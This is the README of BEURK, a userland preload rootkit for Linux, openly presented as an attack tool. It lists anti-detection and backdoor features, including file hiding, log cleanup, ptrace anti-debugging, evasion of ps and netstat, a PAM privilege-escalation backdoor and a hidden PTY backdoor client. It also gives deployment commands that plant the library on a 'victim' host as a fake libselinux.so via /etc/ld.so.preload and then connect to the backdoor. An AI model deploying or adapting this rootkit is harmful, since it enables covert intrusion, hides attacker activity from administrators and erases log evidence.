Awesome

BEURK

Wiki | API Documentation | Getting Started | Contributing

BEURK is an userland preload rootkit for GNU/Linux, heavily focused around anti-debugging and anti-detection.

S'ils savaient, ils vomiraient ...

- The core team -

Features

• Hide attacker files and directories
• Realtime log cleanup (on utmp/wtmp)
• Anti process and login detection
• ptrace(2) hooking for anti-debugging
• libpcap hooking undermines local sniffers
• Bypass unhide, lsof, ps, ldd, netstat analysis
• PAM backdoor for local privilege escalation
• Furtive PTY backdoor client

Usage

• Compile

    git clone https://github.com/unix-thrust/beurk.git
    cd beurk
    ./builder --arch=x64 # build an evil hooking library

• Install

    scp libselinux.so root@victim.com:/lib/
    ssh root@victim.com 'echo /lib/libselinux.so >> /etc/ld.so.preload'

• Enjoy !

    ./client victim_ip:port # connect with furtive backdoor

• BEURK v 1.0 is in active development, please checkout current development branch.

NOTE: BEURK is a recursive acronym for BEURK Experimental Unix Root Kit